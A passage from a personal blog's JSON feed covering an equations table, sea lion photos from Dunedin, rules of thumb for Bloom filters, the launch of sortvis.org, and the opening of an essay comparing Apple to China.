     <td>\n            <img src=\"43.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"44.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"45.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"46.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"47.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"48.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"49.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"50.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"51.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"52.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Sackur-Tetrode_equation\">Sackur-Tetrode equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"53.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Laplace%27s_equation\">Laplace&#39;s equation<\/a><\/h2>\n<table>\n    
<th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"54.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"55.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"56.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"57.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"58.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"59.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"60.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Cauchy-Riemann_equations\">Cauchy-Riemann equations<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"61.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Cubic_equation\">Cubic equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"62.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"63.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n    
    <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"64.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"65.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"66.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Partial_differential_equation\">Partial differential equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"67.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"68.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"69.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"70.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"71.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"72.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"73.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Lane-Emden_equation\">Lane-Emden equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: 
center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"74.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Heat_equation\">Heat equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"75.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"76.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"77.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"78.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"79.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"80.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"81.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"82.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"83.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"84.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n        
    <img src=\"85.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"86.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"87.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"88.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"89.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"90.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"91.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Wave_equation\">Wave equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"92.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"93.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"94.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"95.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Primitive_equations\">Primitive equations<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n    
    <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"96.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"97.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Quintic_equation\">Quintic equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"98.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"99.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"100.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"101.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"102.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Black%E2%80%93Scholes_equation\">Black\u2013Scholes equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"103.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"104.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"105.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a 
href=\"http:\/\/en.wikipedia.org\/wiki\/Fredholm_integral_equation\">Fredholm integral equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"106.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Poisson%27s_equation\">Poisson&#39;s equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"107.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"108.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"109.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Helmholtz_Equation\">Helmholtz Equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"110.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Van_der_Waals_equation\">Van der Waals equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"111.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"112.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"113.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td 
style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"114.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"115.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Lorentz_equation\">Lorentz equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"116.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"117.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"118.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Maxwell%27s_equations\">Maxwell&#39;s equations<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"119.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"120.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"121.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"122.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"123.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" 
class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"124.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"125.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"126.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"127.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"128.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"129.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"130.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"131.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"132.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"133.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n"},{"title":"Sea lions and lifestyle change","published":"2010-09-02T00:00:00+00:00","updated":"2010-09-02T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/photos\/sealions-and-lifestyle\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/photos\/sealions-and-lifestyle\/","content":"<p>About a year and a half ago, after dinner at a favourite local restaurant, and\nhaving entered into 
that zone of philosophical clarity that sets in around the\ndessert wine, my wife and I had the sudden simultaneous realisation that it was\ntime for a change. For most of our adult lives, we had lived in the suburb of\nNewtown in Sydney - a hyper-urban jungle densely packed with coffee shops and\ntheatres, inhabited by a thronging mixture of students and bohemians with\ncounterculturally-correct hairdos. It was all beginning to seem a bit tired and\nsame-ish. We needed more time and more space. We needed to get back to the\nessentials of life.<\/p>\n<p>Four weeks later our furniture was in a shipping container en route to Dunedin,\na small university town near the southern tip of New Zealand. We decided to\nwork together from home, keeping our schedules flexible to make time for walks,\nreading, cooking, and (more recently) spending time with our son. It was a huge\nrisk - it was quite possible that the isolation would impose a punishing work\ntravel regime on me, or put a crimp in my wife's very specialised career in\nlinguistics.  It took enterprise, determination and no small amount of\npossibly-foolish optimism, but it's all worked out. Our leap of faith has\nturned out to be one of the best decisions we've ever made. Dunedin is a\nbreathtakingly beautiful place to live - I still can't quite believe that I can\nget up from my desk, and within 20 minutes be on a deserted beach littered with\nlazy sea lions basking in the winter sun.<\/p>\n<p>My advice to you is this: when your life begins to seem a bit stuffy and\nconstricted, when you begin to feel you've lost sight of something more\nfundamental and get the urge to refactor - <em>just do it<\/em>. 
There has never been a\nbetter time in history for people who choose to march to a different drum.<\/p>\n<p>To prove what a lucky fellow I am, here are two photos from my walk yesterday\nmorning - click to view in a lightbox.<\/p>\n<div class=\"media\">\n    <a href=\"male-full.jpg\">\n        <img src=\"male.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>It's not clear from the picture, but this is a massive New Zealand Sea Lion\nbull - about 400 kilograms of apparently boneless muscle and blubber.<\/p>\n<div class=\"media\">\n    <a href=\"female-full.jpg\">\n        <img src=\"female.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>It's hard to believe that this sleek female is the same species as the dumpy,\nsnub-nosed chap above. New Zealand Sea Lions are the rarest species of sea lion\nin the world - it's an immense privilege to be able to share a beach with them.<\/p>\n"},{"title":"3 Rules of thumb for Bloom Filters","published":"2010-08-25T00:00:00+00:00","updated":"2010-08-25T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/bloom-filter-rules-of-thumb\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/bloom-filter-rules-of-thumb\/","content":"<p>I've spent a few days this week working on a side-project that relies heavily on\nBloom Filters (look for a post on the result of my labours in the next week or\nso). 
If you don't know what a Bloom filter is, <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Bloom_filter\">you should probably find\nout<\/a> - they're very neat and have a\n<a rel=\"external\" href=\"http:\/\/citeseerx.ist.psu.edu\/viewdoc\/download?doi=10.1.1.127.9672&amp;rep=rep1&amp;type=pdf\">huge<\/a>\n<a rel=\"external\" href=\"http:\/\/citeseerx.ist.psu.edu\/viewdoc\/download?doi=10.1.1.4.3831&amp;rep=rep1&amp;type=pdf\">range<\/a>\nof\n<a rel=\"external\" href=\"http:\/\/citeseerx.ist.psu.edu\/viewdoc\/download?doi=10.1.1.126.2458&amp;rep=rep1&amp;type=pdf\">fascinating<\/a>\n<a rel=\"external\" href=\"http:\/\/www.cs.cmu.edu\/~dga\/papers\/fastcache-tr.pdf\">applications<\/a>.<\/p>\n<p>I often need to do rough back-of-the-envelope reasoning about things, and I find\nthat doing a bit of work to develop an intuition for how a new technique\nperforms is usually worthwhile. So, here are three broad rules of thumb to\nremember when discussing Bloom filters down the pub:<\/p>\n<h3 id=\"1-one-byte-per-item-in-the-input-set-gives-about-a-2-false-positive-rate\">1 - One byte per item in the input set gives about a 2% false positive rate.<\/h3>\n<p>In other words, we can add 1024 elements to a 1KB Bloom Filter, and check for\nset membership with about a 2% false positive rate. Nifty. 
Here are some common\nfalse positive rates and the approximate required bits per element, assuming an\noptimal choice of the number of hashes:<\/p>\n<table>\n    <tr>\n        <th>fp rate<\/th> <th>bits<\/th>\n    <\/tr>\n    <tr>\n        <td>50%<\/td> <td>1.44<\/td>\n    <\/tr>\n    <tr>\n        <td>10%<\/td> <td>4.79<\/td>\n    <\/tr>\n    <tr>\n        <td>2%<\/td> <td>8.14<\/td>\n    <\/tr>\n    <tr>\n        <td>1%<\/td> <td>9.58<\/td>\n    <\/tr>\n    <tr>\n        <td>0.1%<\/td> <td>14.38<\/td>\n    <\/tr>\n    <tr>\n        <td>0.01%<\/td> <td>19.17<\/td>\n    <\/tr>\n<\/table>\n<p>Graphically, the relation between bits per element and the false positive rate\nwhen using an optimal number of hashes looks like this:<\/p>\n<div class=\"media\">\n    <a href=\"graph.png\">\n        <img src=\"graph.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Bits per element vs. false positive probability\n    <\/div>\n    \n<\/div><h3 id=\"2-the-optimal-number-of-hash-functions-is-about-0-7-times-the-number-of-bits-per-item\">2 - The optimal number of hash functions is about 0.7 times the number of bits per item.<\/h3>\n<p>This means that the number of hashes is \"small\", varying from about 3 at a 10%\nfalse positive rate, to about 13 at a 0.01% false positive rate.<\/p>\n<h3 id=\"3-the-number-of-hashes-dominates-performance\">3 - The number of hashes dominates performance.<\/h3>\n<p>The number of hashes determines the number of bits that need to be read to test\nfor membership, the number of bits that need to be written to add an element,\nand the amount of computation needed to calculate hashes themselves. 
We may\nsometimes choose to use a less than optimal number of hashes for performance\nreasons (especially when we choose to round down when the calculated optimal\nnumber of hashes is fractional).<\/p>\n<h2 id=\"the-maths\">The maths<\/h2>\n<p>Let's do some maths to justify the above, starting with two well-known results\nabout Bloom filters that can be found in every description of the data\nstructure. First, by a combinatoric argument we can show that the probability\n<strong>p<\/strong> of a false positive is approximated by the following formula, where <strong>k<\/strong>\nis the number of hash functions, <strong>n<\/strong> is the size of the input set and <strong>m<\/strong>\nis the size of the Bloom filter in bits:<\/p>\n<div class=\"media\">\n    <a href=\"formula-1.png\">\n        <img src=\"formula-1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Second, we know that <strong>k<\/strong> is optimal when:<\/p>\n<div class=\"media\">\n    <a href=\"formula-2.png\">\n        <img src=\"formula-2.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Notice that in this formula, <strong>m\/n<\/strong> is the number of bits per element in the\nBloom filter. So, the optimal number of hashes grows linearly with the number\nof bits per element (<strong>b<\/strong>):<\/p>\n<div class=\"media\">\n    <a href=\"formula-6.png\">\n        <img src=\"formula-6.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Assuming an optimal choice for <strong>k<\/strong> in the first formula, we get :<\/p>\n<div class=\"media\">\n    <a href=\"formula-3.png\">\n        <img src=\"formula-3.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Solving for <strong>m<\/strong>:<\/p>\n<div class=\"media\">\n    <a href=\"formula-4.png\">\n        <img src=\"formula-4.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>It's clear from the above that for a given false-positive rate, the number of\nbits in a Bloom filter grows linearly with <strong>n<\/strong>. 
If we set <strong>n = 1<\/strong>, we get\nthe following expression for the approximate number of bits needed per set\nelement:<\/p>\n<div class=\"media\">\n    <a href=\"formula-5.png\">\n        <img src=\"formula-5.png\"  \/>\n    <\/a>\n\n    \n<\/div>"},{"title":"Love and war on Sandfly Beach","published":"2010-08-16T00:00:00+00:00","updated":"2010-08-16T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/photos\/sandflysealions\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/photos\/sandflysealions\/","content":"<p>Hiked to the end of <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Sandfly_Bay\">Sandfly Bay<\/a>\ntoday. A strong North-Easter drove streams of fine beach-sand across the dunes,\nmaking it feel like we were wading knee-deep in a swift river of sand. Surreal\nand beautiful, but I was too afraid of getting grit into my camera to\nphotograph the scene.<\/p>\n<p>At the end of the beach, we found two groups of <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/New_Zealand_Sea_Lion\">New Zealand Sea\nLions<\/a>. 
A female basking\nwith two large cubs, and two young males sparring while a massive mature bull\nlooked on.<\/p>\n<p>Click to view in full size.<\/p>\n<div class=\"media\">\n    <a href=\"sealion_with_cubs_full.jpg\">\n        <img src=\"sealion_with_cubs.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Sea lion with cubs\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"sparring_sealions_full.jpg\">\n        <img src=\"sparring_sealions.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Sparring sea lions\n    <\/div>\n    \n<\/div>"},{"title":"sortvis.org","published":"2010-07-14T00:00:00+00:00","updated":"2010-07-14T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/visualisation\/sortvisdotorg\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/visualisation\/sortvisdotorg\/","content":"<p>I've just put up <a rel=\"external\" href=\"http:\/\/sortvis.org\">sortvis.org<\/a>, the new official home of the\n<a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/sortvis\">sortvis<\/a> sorting algorithm visualisation\nproject. The site has a complete set of up-to-date images, explanations of the\nvisualisation techniques, code snippets, and a rather snazzy Javascript image\nviewer to let you pan and zoom through the huge images produced by the sortvis\n<a rel=\"external\" href=\"http:\/\/sortvis.org\/visualisations.html\">dense<\/a> visualisation. 
Take a look, and\nlet me know what you think!<\/p>\n"},{"title":"Taiaroa Head","published":"2010-05-18T00:00:00+00:00","updated":"2010-05-18T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/photos\/taiaroa\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/photos\/taiaroa\/","content":"<div class=\"media\">\n    <a href=\"taiaroa-full.jpg\">\n        <img src=\"taiaroa.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Taiaroa head\n    <\/div>\n    \n<\/div>\n<p>Taken on a stormy day from Aramoana Mole.<\/p>\n"},{"title":"Apple, China and the war of ideas","published":"2010-05-07T00:00:00+00:00","updated":"2010-05-07T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/politics\/apple-is-china\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/politics\/apple-is-china\/","content":"<p>There was a minor flap recently when <a rel=\"external\" href=\"http:\/\/www.androidguys.com\/2010\/04\/27\/andy-rubin-reacts-steve-jobs-likens-apple-north-korea\/\">Andy Rubin compared Apple to North\nKorea<\/a>.\nMany <a rel=\"external\" href=\"http:\/\/www.youtube.com\/watch?v=lQKdEdzHnfU\">turtle-necked Apple hipsters<\/a>\nhad their feathers mildly ruffled, and bloggers gleefully reaped a tiny flurry\nof page impressions. Quite right too, because Rubin was clearly wrong. Apple is\nnothing like North Korea, because <strong>Apple is the China of the tech world<\/strong>. Lend\nme your ears for a minute, while I make a broad-strokes argument for this\nstatement.<\/p>\n<div class=\"media\">\n    <a href=\"mao.jpg\">\n        <img src=\"mao.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Not so long ago, the consensus in the West was that political liberty and\ncapitalism went hand-in-hand. Wherever one arose, the other would inevitably\nfollow, and in their wake would come prosperity. 
